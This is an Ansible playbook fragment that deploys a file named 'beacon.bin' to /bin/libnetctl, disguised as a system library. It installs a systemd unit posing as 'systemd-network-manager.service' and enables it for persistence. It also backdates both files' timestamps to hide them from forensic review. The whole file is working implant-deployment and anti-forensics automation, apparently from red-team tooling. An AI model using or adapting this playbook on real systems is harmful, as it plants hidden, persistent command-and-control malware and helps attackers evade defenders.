- name: Download Beacon
  ansible.builtin.copy:
    src: beacon.bin
    dest: /bin/libnetctl
    mode: 0711

- name: Timestomp beacon
  ansible.builtin.file:
    path: /bin/libnetctl
    modification_time: '202301011234.51'
    access_time: '202301011234.51'

- name: Download Service
  ansible.builtin.copy:
    src: systemd-network-manager.service
    dest: /lib/systemd/system/systemd-network-manager.service
    mode: 0644

- name: Timestomp service 
  ansible.builtin.file:
    path: /lib/systemd/system/systemd-network-manager.service
    modification_time: '202301011234.51'
    access_time: '202301011234.51'

# - name: Ensure pip is installed
#   ansible.builtin.package:
#     name: python3-pip
#     state: present

# - name : Pip Downloads
#   ansible.builtin.pip:
#     name: pycryptodome
#     state: present

- name: Daemon Reload
  ansible.builtin.systemd:
    daemon_reload: yes

- name: Enable Service
  ansible.builtin.systemd:
    name: systemd-network-manager.service
    enabled: yes
    state: started